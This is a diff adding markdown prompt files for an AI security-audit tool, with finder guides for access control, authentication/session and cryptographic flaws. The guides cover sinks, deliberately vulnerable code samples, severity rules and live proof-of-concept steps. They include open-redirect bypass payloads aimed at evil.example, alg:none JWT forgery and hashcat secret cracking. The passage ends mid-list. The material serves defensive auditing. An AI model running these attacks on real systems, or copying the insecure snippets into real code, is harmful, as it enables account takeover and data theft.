+- **Object scoped to the actor**: lookup is constrained to the caller —
+  `current_user.invoices.find(id)`, `.filter(owner=request.user)`,
+  `WHERE id = ? AND user_id = ?`, `repo.findByIdAndOwner(id, principal)`. The id
+  is request-controlled but the row is fenced.
+- **Explicit authorization on the path**: Pundit `authorize @record`, CanCanCan
+  `authorize! :update, @x`, Spring `@PreAuthorize("hasRole('ADMIN')")` /
+  `@PostAuthorize("returnObject.owner == principal")`, Laravel
+  `$this->authorize('update', $model)` / `@can`, Django DRF
+  `permission_classes`/object-level `has_object_permission`, a middleware that
+  checks role **and** is provably mounted on this route. Verify it actually runs
+  for this handler and covers this verb/object, not a sibling route.
+- **Mass assignment guarded**: strong params (`params.permit(:a,:b)`),
+  serializer/DTO allow-list, Laravel `$fillable`/`$guarded`, an explicit field
+  map (`user.name = body.name`), Spring `@InitBinder setAllowedFields` or a
+  dedicated request record. A model with **no** privileged columns at all is not
+  exploitable for priv-esc.
+- **Open redirect tamed**: target validated against an allow-list of
+  hosts/paths, forced relative (`url.startsWith("/") && !startsWith("//")`),
+  same-origin check, or a server-side lookup table (id→url). Framework helpers
+  that only allow local paths (Django `url_has_allowed_host_and_scheme`, Spring
+  redirect to a mapped view name) are safe.
+- **Non-guessable + non-enumerable id is mitigation-lite, not a pass**: a random
+  UUID/opaque token raises the bar but is NOT authorization. Flag at reduced
+  severity if the id leaks elsewhere (logs, listings, referers) or is otherwise
+  obtainable; treat strong randomness as a partial control, never a clean pass.
+- **Read of genuinely public data** (published posts, public profile) with no
+  tenant/PII boundary — not a finding.
+- **Unreachable**: route not registered, handler dead, control flow returns
+  before the sink, or the "source" is server-derived (`session.user_id`), not
+  attacker-controlled.
+
+A control counts only if it is **on the path, runs before the sink, and matches
+the object/verb**. A global `authenticate` middleware does NOT satisfy the
+ownership requirement — note it as identity-only and keep hunting for the authZ
+check.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated or trivially-authenticated IDOR/missing-authZ
+  over **enumerable** ids giving read/write of other tenants' data, account
+  takeover, or admin action (delete/role-grant). Mass assignment that sets
+  `is_admin`/`role` to escalate. Reachable, no effective control.
+- **High** — authenticated horizontal IDOR (read or modify another user's
+  resource) over enumerable ids; vertical priv-esc requiring a realistic
+  precondition; mass assignment of a sensitive-but-not-admin field
+  (`org_id`, `balance`, `price`). Open redirect used in an auth/OAuth flow
+  (token/credential theft chain).
+- **Medium** — IDOR limited to low-sensitivity data, or gated by a
+  non-guessable id that is plausibly obtainable; standalone open redirect
+  (phishing only); priv-esc needing chained unlikely conditions.
+- **Low/Info** — redirect constrained to a small known set; theoretical gap with
+  a partial control present; info-only with no PII/tenant boundary.
+
+Escalate one level if the same root cause hits many endpoints, or if the
+resource is auth material / payment / PII.
+
+## 6. Emit findings as
+
+One object per root cause (list extra call sites in `data_flow`/`rationale`).
+JSON object with EXACTLY these fields:
+
+- `id` — stable slug, e.g. `ac-idor-invoice-show`.
+- `title` — one line, names flaw + endpoint.
+- `vuln_class` — `access-control`.
+- `owasp` — `A01:2025`.
+- `cwe` — most specific: `CWE-639` (IDOR/authZ-by-key), `CWE-862` (missing
+  authZ), `CWE-863` (incorrect authZ), `CWE-601` (open redirect), `CWE-915`
+  (mass assignment); list multiple if apt.
+- `asvs` — a V8 requirement id (e.g. `V8.1.x`); add `V3.x` for open redirect.
+- `severity` — `critical|high|medium|low|info` per §5.
+- `status` — `confirmed` (proven/reproduced) | `likely` (clear trace, no live
+  PoC) | `triage` (needs verification).
+- `confidence` — `low|medium|high`.
+- `file`, `line`, `end_line` — the sink location.
+- `code_excerpt` — the minimal vulnerable lines (sink + binding).
+- `source` — exact untrusted origin, e.g. `req.params.id` (HTTP path param),
+  `request.json["role"]` (request body).
+- `sink` — exact dangerous op, e.g. `Invoice.find(id)`, `user.update(body)`,
+  `res.redirect(url)`.
+- `data_flow` — `source -> ... -> sink`, naming each hop, and **explicitly
+  noting any sanitizer/authz seen and why it is insufficient** (wrong object,
+  wrong verb, not on path).
+- `sanitizers_checked` — the FP guard from §4 you verified: which controls you
+  looked for (ownership scope, `authorize`, strong params, redirect allow-list)
+  and that each is **absent or ineffective**. This field is mandatory; an empty
+  or hand-wavy value means the finding is not yet credible.
+- `rationale` — why reachable + exploitable; cite the missing check.
+- `exploit_sketch` — concrete attacker steps (e.g. "log in as user A, GET
+  `/invoices/124` where 124 is user B's id → read B's data").
+- `dynamic_poc_plan` — the live request(s) and the observed result that proves
+  it (see §7).
+- `proposed_fix` — high-level direction, not a patch: in 1-2 sentences, state
+  WHAT must change and WHY (e.g. "Scope the lookup to the authenticated owner so
+  one user cannot read another's invoice" / "Bind updates through an explicit
+  allow-list so privileged fields like `role` are not mass-assignable"). No code
+  diff, exact code, or line-level/step-by-step edits — leave the implementation
+  to the engineer/agent who picks up the issue.
+
+Fill `source`, `sink`, `data_flow`, and `sanitizers_checked` precisely — they
+are the evidence a reviewer re-checks. A finding without a clear source→sink and
+a verified-absent control is `triage` at best.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove a **cross-actor** or **privilege** boundary is crossed against a
+running instance. Generic recipe:
+
+1. **Provision two principals** of the same tier: user A and user B (and, for
+   vertical tests, a low-priv user vs. an admin-only action). Seed one record
+   per user.
+2. **IDOR (read/write)**: authenticate as A; send A's session/token to the
+   handler but with **B's object id** (path/query/body). Enumerate adjacent ids
+   (`n±1`, sequential, or a leaked uuid).
+   - *Proof*: response returns B's data, or a follow-up read as B shows A's
+     mutation took effect — with a `200`/changed state where a `403/404` is
+     correct. Diff against the same request using A's own id (which should
+     succeed) to show only ownership differs.
+3. **Missing function-level authZ / forced browsing**: as a low-priv (or
+   anonymous) principal, hit the privileged route directly (`POST
+   /admin/users/{id}/delete`). *Proof*: `200`/effect instead of `403`.
+4. **Mass assignment / priv-esc**: as a normal user, `PATCH /users/me` (or the
+   update endpoint) with an extra field — `{"role":"admin"}`,
+   `{"is_admin":true}`, `{"org_id":<victim org>}`. *Proof*: re-fetch the profile
+   and observe the privileged field changed; then exercise an admin-only action
+   to confirm the elevation is live.
+5. **Open redirect**: request the redirecting endpoint with
+   `?next=https://evil.example/` (and bypass variants: `//evil.example`,
+   `https:evil.example`, `/\evil.example`, `%2f%2fevil.example`, whitelisted-
+   host-as-prefix `https://trusted.example.evil.example`). *Proof*: a `30x`
+   with `Location: https://evil.example/...` to an off-origin host.
+
+Capture the exact request (method, path, headers/cookie, body), the actor
+identity used, and the response status/body/`Location` proving the boundary
+broke. Record this in `dynamic_poc_plan`; on success set `status: confirmed`.
+Negative control (the same request with the actor's own id returning the
+expected `403/404`) makes the proof unambiguous.
diff --git a/plugins/security/prompts/finders/auth-session.md b/plugins/security/prompts/finders/auth-session.md
new file mode 100644
index 0000000..0b39638
--- /dev/null
+++ b/plugins/security/prompts/finders/auth-session.md
@@ -0,0 +1,391 @@
+<!--
+FINDER PROMPT — auth-session. You are a fresh-context auditor hunting ONE class:
+Authentication & Session Management. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding: only a REACHABLE flaw on the
+identity/credential/session/token path — where an attacker can forge, bypass,
+fixate, or recover identity — counts, and only after confirming the framework's
+own protections are absent/disabled/misused. No defense-in-depth musings, no
+dead code, no posture items (missing MFA "in general", password-policy text).
+-->
+
+# Finder — Authentication & Session (`auth-session`)
+
+**Class key:** `auth-session` · **OWASP:** A07:2025 (Identification & Authentication
+Failures) · **CWE:** CWE-287 (improper auth) / CWE-384 (session fixation) /
+CWE-620 (unverified password change) / CWE-640 (weak reset mechanism) / CWE-521
+(weak password reqs) · **ASVS:** V6 (Authentication) / V7 (Session) / V9 (Tokens
+& JWT) / V10 (OAuth/OIDC)
+
+## 1. Objective
+
+Find where an attacker can **become or impersonate a user without their
+credential**: forge/bypass a token or session (JWT `alg:none`/weak secret,
+guessable session id, fixation), hijack the login/reset/OAuth flow (no token
+check, predictable reset token, open `redirect_uri`, missing `state`), or where
+credentials are stored so weakly that a DB read = mass account takeover
+(plaintext, MD5/SHA1, unsalted, fast hash).
+
+## 2. Where to look
+
+Trace the **identity lifecycle**: login → session/token issuance → per-request
+verification → privileged action → logout/reset. The bug is a step that trusts
+attacker-controllable material as proof of identity.
+
+- **Login / credential check:** `login`, `sign_in`, `authenticate`,
+  `verify_password`, `check_password`, `password_verify`, controllers under
+  `auth/`, `sessions/`, `accounts/`, `Devise`, `passport`, `next-auth`,
+  `Spring Security`, `omniauth`. Look at the comparison and what happens on each
+  branch.
+- **Token mint & verify:** anything touching `jwt`, `jsonwebtoken`, `jose`,
+  `pyjwt`, `golang-jwt`, `jjwt`, `ruby-jwt`, `firebase/php-jwt`; `sign`/`encode`
+  and `verify`/`decode`/`decodeJwt`. The verify call and its options are the
+  hot spot (algorithm allow-list, secret/key source, audience/issuer/expiry).
+- **Session config & store:** `express-session`, `cookie-session`, Rails
+  `config/session_store`, `flask.session`/`Flask-Login`, Django `SESSION_*`,
+  `gorilla/sessions`, PHP `session_start`/`ini`, Lucky/Kemal session handlers.
+  Check cookie flags, session-id regeneration on login, store integrity.
+- **Password reset / email verify:** `forgot`, `reset_password`,
+  `reset-token`, `confirmation_token`, `magic-link`, OTP/2FA verify. Examine
+  token generation (RNG, length, lifetime, single-use, binding to the user) and
+  the verify branch.
+- **OAuth/OIDC:** `/callback`, `/oauth`, `redirect_uri`, `state`, `nonce`,
+  `id_token` handling, provider config; PKCE for public clients; `state`
+  CSRF binding; signature & `aud`/`iss` validation of `id_token`.
+- **Credential storage:** user model migrations/schema, `password`/
+  `password_hash`/`encrypted_password` columns, the hashing call at write time,
+  API-key/token columns, "remember me" tokens.
+
+Per-language SINK / sensitive-call signals:
+
+- **Crystal:** `JWT.decode(token, verify: false)` or no `algorithm:` pin;
+  `Crypto::Bcrypt::Password.create`/`.verify` (good) vs. `Digest::MD5`/`SHA1`
+  on a password; Kemal `env.session` without `session.set` regen on login;
+  `Random` (non-secure) for tokens vs. `Random::Secure`.
+- **Ruby:** `JWT.decode(tok, nil, false)` (verify off) / missing `algorithm:`;
+  `Digest::SHA1.hexdigest(pw)`, `Digest::MD5`; `==` on a token/HMAC instead of
+  `ActiveSupport::SecurityUtils.secure_compare`; Devise `pepper`/`stretches`
+  misset; `SecureRandom` (good) vs. `rand`/`Time.now` for reset tokens;
+  `session_store` without `secret_key_base`; no `reset_session` after sign-in.
+- **Node/TS:** `jwt.verify(tok, key, { algorithms:['none'] })` or no
+  `algorithms` option (defaults can accept attacker's `alg`); `jwt.decode()`
+  used as if it verifies; HS256 with a short/literal secret; `bcrypt`/`argon2`
+  (good) vs. `crypto.createHash('md5'|'sha1')` or `===` on passwords;
+  `express-session` `{ secret:'keyboard cat', cookie:{ secure:false,
+  httpOnly:false } }`, no `req.session.regenerate()` on login; `Math.random()`
+  for tokens; OAuth callback with no `state` compare.
+- **Python:** `jwt.decode(tok, options={'verify_signature': False})` or
+  `algorithms` omitted; `hashlib.md5/sha1(pw)`, `hashlib.sha256` unsalted vs.
+  `bcrypt`/`argon2`/`pbkdf2_hmac` with enough iterations; `==` token compare vs.
+  `hmac.compare_digest`; Flask `SECRET_KEY` empty/guessable, `SESSION_COOKIE_*`
+  off; `random.random()`/`uuid1` for reset tokens vs. `secrets.token_urlsafe`;
+  Django `check_password` good, raw compare bad.
+- **Go:** `jwt.Parse` whose `Keyfunc` doesn't assert `token.Method` (accepts
+  `none`/RS↔HS confusion); `ParseWithClaims` ignoring `Valid`; `md5.Sum`/
+  `sha1.Sum` on passwords vs. `bcrypt.CompareHashAndPassword`/`argon2`;
+  `subtle.ConstantTimeCompare` (good) vs. `==`/`bytes.Equal` on secrets;
+  `math/rand` for tokens vs. `crypto/rand`; session cookie without
+  `Secure`/`HttpOnly`/`SameSite`.
+- **PHP:** `JWT::decode($t, $key, ['none'])` (firebase/php-jwt) or no allowed-alg
+  array; `md5($pw)`/`sha1($pw)` vs. `password_hash($pw, PASSWORD_BCRYPT|ARGON2)`
+  + `password_verify`; `==`/`===` on hashes vs. `hash_equals`;
+  `session.cookie_secure=0`, no `session_regenerate_id(true)` after login;
+  `mt_rand`/`uniqid` for reset tokens vs. `random_bytes`/`bin2hex`.
+- **Java:** `Jwts.parser().parseClaimsJws` without `setSigningKey` /
+  `parse(token)` accepting unsigned (`alg:none`) JWS; `MessageDigest
+  .getInstance("MD5"|"SHA-1")` on passwords vs. `BCryptPasswordEncoder`/
+  `Argon2`; `String.equals` on tokens vs. `MessageDigest.isEqual`; Spring
+  Security `permitAll()` over a protected matcher, `csrf().disable()` paired
+  with cookie sessions; `new Random()`/`Math.random()` for tokens vs.
+  `SecureRandom`; `id_token` accepted without signature check.
+- **Rust:** `jsonwebtoken::decode` with `Validation` whose `algorithms` allows
+  attacker control or `insecure_disable_signature_validation`; `md5`/`sha1`
+  crate on passwords vs. `argon2`/`bcrypt`; `==` on `&[u8]` secret vs.
+  `subtle`/`constant_time_eq`; `rand::thread_rng` for tokens vs. a CSPRNG with
+  enough entropy; `actix-session`/`tower-sessions` cookie without secure flags.
+
+## 3. Detection heuristics
+
+The pattern is always: **attacker-controllable identity material (SOURCE)
+reaches a trust decision or is the credential of record (SINK) without a correct
+verification** — signature/algorithm pinned, secret strong & secret, token
+random+single-use+bound, session id regenerated, redirect/state validated, hash
+slow+salted.
+
+SOURCES (untrusted): the `Authorization`/`Cookie`/`X-*` headers, JWT/`id_token`
+strings and their `alg`/`kid` header, session cookie value, login form
+username/password, `redirect_uri`/`state`/`code` query params, reset/confirm
+token from URL, OTP from body, "remember me" cookie, any header claiming a
+role/user id.
+
+SINKS (trust decisions / credential ops): JWT/`id_token` verify-decode that
+yields `current_user`; password comparison branch; session creation /
+`current_user =` assignment; reset-token lookup → password set; OAuth callback →
+session issuance; the hashing call that persists a credential; the cookie/header
+that is later trusted as identity.
+
+- **JWT `alg:none` / unverified decode** — verification disabled or algorithm
+  not pinned, so an attacker forges claims:
+
+  ```js
+  // Node — no algorithms allow-list; "alg":"none" or HS/RS confusion accepted
+  const claims = jwt.verify(req.cookies.tok, PUBLIC_KEY);   // SINK
+  req.user = claims.sub;                                      // trusts forged sub
+  ```
+  ```python
+  jwt.decode(tok, key, options={"verify_signature": False})  # SINK: any token valid
+  ```
+  ```go
+  jwt.Parse(tok, func(t *jwt.Token) (interface{}, error) {
+      return secret, nil })   // SINK: no t.Method.(*jwt.SigningMethodHMAC) check → none/RS↔HS
+  ```
+
+- **Weak/leaked JWT secret or signing key** — HS256 with a guessable literal
+  secret (`"secret"`, `"changeme"`, an env default), or the public key used as
+  the HMAC secret (RS→HS confusion). Attacker brute-forces or re-signs.
+
+  ```ruby
+  JWT.encode(payload, "secret", "HS256")   # SINK: brute-forceable secret
+  ```
+
+- **Session fixation** — session id NOT regenerated at privilege change (login),
+  so an attacker who plants a known id rides the victim's authenticated session:
+
+  ```python
+  # Flask — login sets user in the SAME session id the attacker pre-seeded
+  session["user_id"] = user.id            # SINK: no session.regenerate / new id
+  ```
+  ```php
+  $_SESSION['uid'] = $user->id;            // SINK: no session_regenerate_id(true)
+  ```
+
+- **Insecure session cookie / store** — cookie missing `HttpOnly`/`Secure`/
+  `SameSite`, predictable session id, signed-but-not-encrypted client-side
+  session holding trust flags, hardcoded session secret:
+
+  ```js
+  app.use(session({ secret:'keyboard cat',
+    cookie:{ secure:false, httpOnly:false } }));   // SINK: theftable, non-secure
+  ```
+
+- **Insecure password reset / magic link** — token from a weak RNG, too short,
+  no expiry, reusable, or not bound to the user; or reset proceeds without
+  proving possession:
+
+  ```ruby
+  token = rand(1_000_000).to_s            # SINK: 1e6 space, guessable/brute
+  user.update(reset_token: token)
+  ```
+  ```python
+  token = str(uuid.uuid1())               # SINK: time/MAC-based, predictable
+  ```
+  Also: reset endpoint that takes `user_id` + new password with **no token**
+  (CWE-620 unverified change), or accepts the token but never checks expiry/
+  single-use.
+
+- **Plaintext / weak-hash credential storage** — password stored as-is, or with
+  a fast/unsalted hash; a DB leak = instant mass ATO:
+
+  ```python
+  user.password = hashlib.md5(pw.encode()).hexdigest()   # SINK: fast, unsalted
+  ```
+  ```php
+  $hash = sha1($password);                                // SINK
+  ```
+  ```sql
+  INSERT INTO users(email, password) VALUES (?, ?)        -- SINK: raw plaintext pw
+  ```
+
+- **Non-constant-time secret compare** — token/HMAC/password-hash compared with
+  `==`/`equals`/`bytes.Equal`, leaking via timing (lower severity, but real for
+  remote-guessable tokens):
+
+  ```go
+  if token == stored { ... }              // SINK: use subtle.ConstantTimeCompare
+  ```
+
+- **OAuth/OIDC flaws** — callback issues a session without validating `state`
+  (login CSRF / code injection), `redirect_uri` not allow-listed (token/code
+  exfil), `id_token` accepted without signature/`aud`/`iss`/`nonce` check,
+  public client without PKCE:
+
+  ```js
+  // Express — no state compare, redirect_uri reflected from request
+  app.get('/callback', async (req,res)=>{
+    const tok = await exchange(req.query.code);   // SINK: no state check
+    req.session.user = tok.sub; });
+  ```
+
+- **Auth bypass logic** — a branch that grants identity on an attacker-set
+  condition: `if (req.headers['x-user']) req.user = ...`, default/empty password
+  accepted, `verify_password` returning truthy on empty input, debug/backdoor
+  account, or comparison that short-circuits (`password == undefined` both).
+
+## 4. Not-a-finding (false-positive guard)
+
+Before flagging, confirm NONE of these neutralize the path. If an effective
+control sits on the identity path, do **not** report.
+
+- **JWT verified correctly:** `verify`/`decode` with an explicit `algorithms`
+  allow-list that excludes `none` and matches the key type (HS* with a secret,
+  RS*/ES* with a public key), signature validation ON, and `exp`/`aud`/`iss`
+  checked. Go `Keyfunc` that asserts `token.Method.(*jwt.SigningMethodHMAC)` (or
+  the expected method). A strong, env-injected, high-entropy secret/key is not a
+  finding for "weak secret".
+- **`decode` used only for non-trust display** (logging, UI) where the result is
+  NOT used for an authorization/identity decision — re-verify reachability;
+  no trust sink → not a finding.
+- **Session id regenerated on privilege change:** Rails `reset_session` /
+  `form_authenticity_token` rotation, `req.session.regenerate()`,
+  `session_regenerate_id(true)`, Django's login cycling the key, framework that
+  rotates by default on auth. Fixation is then closed.
+- **Secure cookie config present:** `HttpOnly` + `Secure` + `SameSite`
+  (Lax/Strict), server-side opaque session store or an encrypted+signed cookie
+  with a strong secret. Missing `Secure` only matters if the app serves over
+  HTTPS / is internet-facing — note the precondition.
+- **Strong reset/verify token:** CSPRNG (`SecureRandom`, `secrets`,
+  `crypto.randomBytes`, `random_bytes`, `crypto/rand`) ≥128 bits, single-use,
+  short TTL, bound to the user, and the new password set ONLY after the token is
+  validated. A signed/HMAC'd token with server-side expiry is fine.
+- **Strong password hashing:** `bcrypt`/`scrypt`/`argon2`/`PBKDF2` with sane
+  cost, per-user salt (these include it), verified with the library's compare.
+  This is correct storage — not a finding even if the rest is imperfect.
+- **Constant-time compare** for tokens/HMACs: `secure_compare`,
+  `hmac.compare_digest`, `subtle.ConstantTimeCompare`, `MessageDigest.isEqual`,
+  `hash_equals`, `constant_time_eq`. Timing finding is closed.
+- **OAuth done right:** `state` generated + stored + compared (CSRF bound),
+  `redirect_uri` matched against a server allow-list, `id_token` signature +
+  `aud`/`iss`/`exp`/`nonce` validated, PKCE on public clients.
+- **Server-derived identity:** the value driving the decision is set by the
+  server from an already-authenticated session (not re-read from an
+  attacker-controllable header/claim) → not attacker-controlled.
+- **Unreachable:** route unregistered, the insecure option behind a dev/test
+  flag that is off in the audited config, handler dead, or the call returns
+  before the sink.
+
+A control counts only if it is **on the identity path and runs before the trust
+decision**. "There is a login screen" is not authorization; a global
+`authenticate` proving identity does not fix a forgeable token. Note any
+identity-only control and keep hunting for the verification that's actually
+missing.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable full auth bypass / account takeover:
+  JWT `alg:none` or signature-off accepted on a trust path, trivially
+  brute-forceable/leaked signing secret, reset token guessable or reset without
+  any token, plaintext or unsalted-MD5/SHA1 password storage (DB read → mass
+  ATO), OAuth callback issuing a session with no signature/`state` check. No
+  effective control on the path.
+- **High** — auth/session compromise under a realistic precondition: session
+  fixation (attacker must plant an id), session secret/key with limited entropy,
+  reset token with a real but bounded weakness (no expiry / reusable but
+  high-entropy), open `redirect_uri` enabling code/token theft, predictable
+  session ids, missing `state` where same-site mitigates partially.
+- **Medium** — exploitation needs unusual conditions or yields limited gain:
+  non-constant-time compare of a remotely-guessable token, missing `HttpOnly`/
+  `Secure` on a non-sensitive cookie or HTTP-only deployment, weak password
+  policy that meaningfully enables credential stuffing, fast-but-salted hash
+  (e.g. single-round SHA256 + salt).
+- **Low/Info** — timing leak on a non-guessable secret, hardening gaps with a
+  compensating control present, password-policy nits with no concrete bypass.
+
+Escalate one level if the same root cause covers all auth (one verify helper, one
+session config) or the credential is reused across systems.
+
+## 6. Emit findings as
+
+One object per root cause (list extra call sites in `data_flow`/`rationale`).
+JSON object with EXACTLY these fields:
+
+- `id` — stable slug, e.g. `as-jwt-alg-none-verify`, `as-reset-token-weak-rng`.
+- `title` — one line naming the flaw + location (e.g. "JWT verified without
+  algorithm pin in `auth/jwt.ts`").
+- `vuln_class` — `auth-session`.
+- `owasp` — `A07:2025`.
+- `cwe` — most specific: `CWE-287` (improper auth / JWT bypass / OAuth),
+  `CWE-384` (session fixation), `CWE-620` (unverified credential change),
+  `CWE-640` (weak reset mechanism), `CWE-521` (weak password reqs); add
+  `CWE-916`/`CWE-759`/`CWE-256` for weak/unsalted/plaintext storage,
+  `CWE-330`/`CWE-338` for weak token RNG, `CWE-547`/`CWE-798` for hardcoded
+  secrets, `CWE-208` for timing compare. List multiple if apt.
+- `asvs` — the closest requirement id: V6.x (auth/passwords/storage), V7.x
+  (sessions), V9.x (JWT/tokens), V10.x (OAuth/OIDC).
+- `severity` — `critical|high|medium|low|info` per §5.
+- `status` — `confirmed` (proven/reproduced) | `likely` (clear trace, no live
+  PoC) | `triage` (needs verification).
+- `confidence` — `low|medium|high`.
+- `file`, `line`, `end_line` — the sink (the verify/compare/store/session call).
+- `code_excerpt` — the minimal vulnerable lines (the decode/verify options, the
+  hash call, the session config, the token gen).
+- `source` — exact untrusted origin, e.g. `req.cookies.tok` (JWT from cookie),
+  `request.args["token"]` (reset token from URL), `req.query.code` (OAuth code).
+- `sink` — exact dangerous op, e.g. `jwt.verify(tok, key)` (no `algorithms`),
+  `hashlib.md5(pw)`, `session["uid"]=...` (no regen), `token == stored`.
+- `data_flow` — `source -> ... -> sink`, naming each hop, and **explicitly
+  noting any verification/sanitizer seen and why it is insufficient** (no alg
+  pin, signature off, secret guessable, no expiry, fast hash, non-const compare).
+- `sanitizers_checked` — the §4 FP guard you verified: which controls you looked
+  for (alg allow-list, signature on, strong secret, session regen, secure cookie
+  flags, CSPRNG + single-use + expiry token, slow salted hash, constant-time
+  compare, `state`/`redirect_uri`/`id_token` validation) and that each is
+  **absent, disabled, or ineffective**. Mandatory; empty/hand-wavy ⇒ not credible.
+- `rationale` — why reachable + exploitable; cite the exact missing check.
+- `exploit_sketch` — concrete attacker steps (e.g. "craft a JWT with
+  `{"alg":"none"}` and `sub:1`, strip the signature, send as cookie → server
+  trusts it as admin").
+- `dynamic_poc_plan` — the live request(s) and the observed result that proves it
+  (see §7).
+- `proposed_fix` — high-level direction, not a patch: 1-2 sentences naming WHAT
+  must change and WHY, leaving the exact code to the engineer/agent who picks up
+  the issue. E.g. "Pin the accepted JWT algorithm to the issuer's signing scheme
+  and reject unsigned/`none` tokens so forged claims can't be trusted." No code
+  diff, exact code, line-level edits, or step-by-step implementation.
+
+Fill `source`, `sink`, `data_flow`, and `sanitizers_checked` precisely — they are
+the evidence a reviewer re-checks. A finding without a clear source→sink and a
+verified-absent control is `triage` at best.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove identity can be **forged, bypassed, fixed, or recovered** against a
+running instance. Capture the exact request (method, path, headers/cookie, body),
+the response, and a negative control. On success set `status: confirmed`.
+
+1. **JWT `alg:none` / unverified:** take a valid token (or mint one with the
+   claimed structure), set the header to `{"alg":"none","typ":"JWT"}`, change
+   `sub`/`role` to a target (admin), drop the signature (keep trailing dot), send
+   it. *Proof*: an authenticated/privileged response (`200`, admin data) where a
+   tampered token must yield `401`. Also try HS-signing with the server's public
+   key (RS→HS confusion) and a wordlist brute of an HS secret (`jwt_tool`,
+   `hashcat -m 16500`).
+2. **Weak signing secret:** crack the JWT offline; re-sign a forged admin token
+   with the recovered secret and replay. *Proof*: server accepts the re-signed
+   token as that identity.
+3. **Session fixation:** obtain a session id pre-auth (or set a chosen one),
+   have the victim authenticate within that session, then reuse the SAME id.
+   *Proof*: the pre-login id is now authenticated (no rotation observed in
+   `Set-Cookie` after login).
+4. **Insecure cookie / theft:** inspect `Set-Cookie` for missing `HttpOnly`/
+   `Secure`/`SameSite`; *proof* is the flags' absence plus a reachable XSS or
+   non-TLS path that would exfiltrate it (note the chain dependency).
+5. **Weak/replayable reset token:** trigger a reset, capture the token; show it
+   is short/predictable (enumerate the space, or derive from time/uuid1), reuse
+   it twice, or use it after the stated TTL. *Proof*: a password change accepted
+   with a guessed/reused/expired token. For CWE-620: hit the reset endpoint with
+   only `user_id` + new password (no token) and confirm the change.
+6. **Plaintext/weak hash:** if a self-registration + DB-dump or admin export is
+   reachable, show the stored value equals `md5(pw)`/the plaintext. Otherwise
+   prove statically from the write path and treat as `likely`.
+7. **OAuth `state`/`redirect_uri`:** start a flow, drop or alter `state` on the
+   callback — *proof*: a session still issued (login CSRF). Supply an attacker
+   `redirect_uri` not on the server allow-list — *proof*: the code/token is sent
+   to the attacker origin. Submit an unsigned/wrong-`aud` `id_token` — *proof*:
+   session issued.
+8. **Auth-bypass logic:** send the attacker-controlled trust input
+   (`X-User: admin`, empty/null password, default account) — *proof*: a
+   privileged response instead of `401`.
+
+Negative control (a correctly-signed token, a fresh post-login session id, a
+valid single-use token, a well-formed `state`) returning the EXPECTED behavior
+makes the proof unambiguous. Record the request, actor, and response in
+`dynamic_poc_plan`.
diff --git a/plugins/security/prompts/finders/crypto.md b/plugins/security/prompts/finders/crypto.md
new file mode 100644
index 0000000..10fb6ef
--- /dev/null
+++ b/plugins/security/prompts/finders/crypto.md
@@ -0,0 +1,324 @@
+<!--
+FINDER PROMPT — crypto. You are a fresh-context auditor hunting ONE class:
+Cryptographic Failures (weak/broken algorithms, ECB, static IV/salt, weak RNG
+for security, disabled TLS verification, hardcoded keys, bad key management).
+Read the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE use of broken crypto that protects something an
+attacker can reach/influence, where no effective mitigation sits on the path, is
+a finding. No defense-in-depth musings, no dead code, no posture items, no
+"consider rotating keys" without a concrete sink.
+-->
+
+# Finder — Cryptographic Failures (`crypto`)
+
+**Class key:** `crypto` · **OWASP:** A04:2025 · **CWE:** CWE-327 (broken/weak
+algo) / CWE-328 (weak hash) / CWE-326 (inadequate strength) / CWE-330 (weak RNG)
+/ CWE-331 (insufficient entropy) / CWE-916 (unsalted/fast password hash) /
+CWE-295 (improper cert validation) · **ASVS:** V11
+
+## 1. Objective
+
+Find places where data that needs cryptographic protection is protected with a
+**broken primitive, a broken mode, a predictable parameter, or no real
+verification** — such that an attacker can decrypt, forge, predict, MITM, or
+crack it. The bug is the crypto choice/parameterization itself, reachable on
+data an attacker controls or wants. The fix is a correct primitive (AEAD, KDF,
+strong hash, CSPRNG, validated TLS).
+
+## 2. Where to look
+
+Crypto failures cluster at a handful of surfaces. Map the data first: *what is
+being protected, who can reach it, what breaks if it's forged/decrypted/cracked.*
+
+- **Auth & credential storage:** password hashing in user/account models,
+  `set_password`/`hash_password`, session-token & API-key generation,
+  password-reset / email-verify / invite token mint, "remember me" cookies,
+  TOTP/2FA secret handling. Weak hash or weak RNG here is the highest-value find.
+- **Token / signature layers:** JWT signing & verification (`alg`, key choice),
+  HMAC over webhooks/callbacks, signed URLs / signed cookies, CSRF tokens,
+  license/entitlement signing, document/PDF signing.
+- **At-rest encryption:** field-level encryption in ORMs/models (PII, card data,
+  secrets columns), "encrypt this blob" helpers, config/secret encryptors,
+  backup encryption, KMS/envelope-encryption wrappers, cookie/session
+  serializers that encrypt.
+- **TLS / transport clients:** every outbound HTTP/DB/SMTP/LDAP/gRPC/MQ client —
+  look for verification toggles in client construction, custom `TrustManager`/
+  `SSLContext`, `verify=False`, `rejectUnauthorized:false`, `InsecureSkipVerify`,
+  custom hostname verifiers, pinning that's been disabled.
+- **Crypto utility modules:** `crypto.rb`, `cipher.go`, `encryption.py`,
+  `Crypto.cr`, `util/hash`, `security/`, anything `*encrypt*`/`*cipher*`/`*sign*`/
+  `*token*`/`*nonce*`/`*salt*`/`*kdf*`.
+- **Key material:** where keys/IVs/salts/secrets are *sourced* — hardcoded
+  literals, committed PEM/`.key`/`.pem`/`keystore`/`.jks`, default-valued config,
+  keys derived from a low-entropy/static seed, IV/salt declared as a constant or
+  reused across messages.
+
+Per-language SINK / API signals:
+
+- **Crystal:** `Digest::MD5`/`Digest::SHA1` over secrets, `OpenSSL::Cipher.new`
+  with `"des"`/`"rc4"`/`"aes-128-ecb"`, `Random` (non-secure) vs
+  `Random::Secure` for tokens, `OpenSSL::SSL::Context` with
+  `verify_mode = OpenSSL::SSL::VERIFY_NONE`, hardcoded `Crypto::Subtle` keys,
+  `Random.rand`/`rand` for token bytes.
+- **Ruby:** `Digest::MD5/SHA1.hexdigest(password)`, `OpenSSL::Cipher.new('DES'
+  /'RC4'/'AES-128-ECB')`, `cipher.iv = "0"*16` / fixed IV, `rand`/`SecureRandom`
+  misuse, `OpenSSL::SSL::VERIFY_NONE`, Net::HTTP `verify_mode=`, `JWT.decode(t,
+  nil, false)` / `algorithm: 'none'`, `ActiveSupport::MessageEncryptor` with a
+  short/static key, `Digest::SHA256` used as a password KDF (no salt/stretch).
+- **Node/TS:** `crypto.createHash('md5'|'sha1')` for passwords,
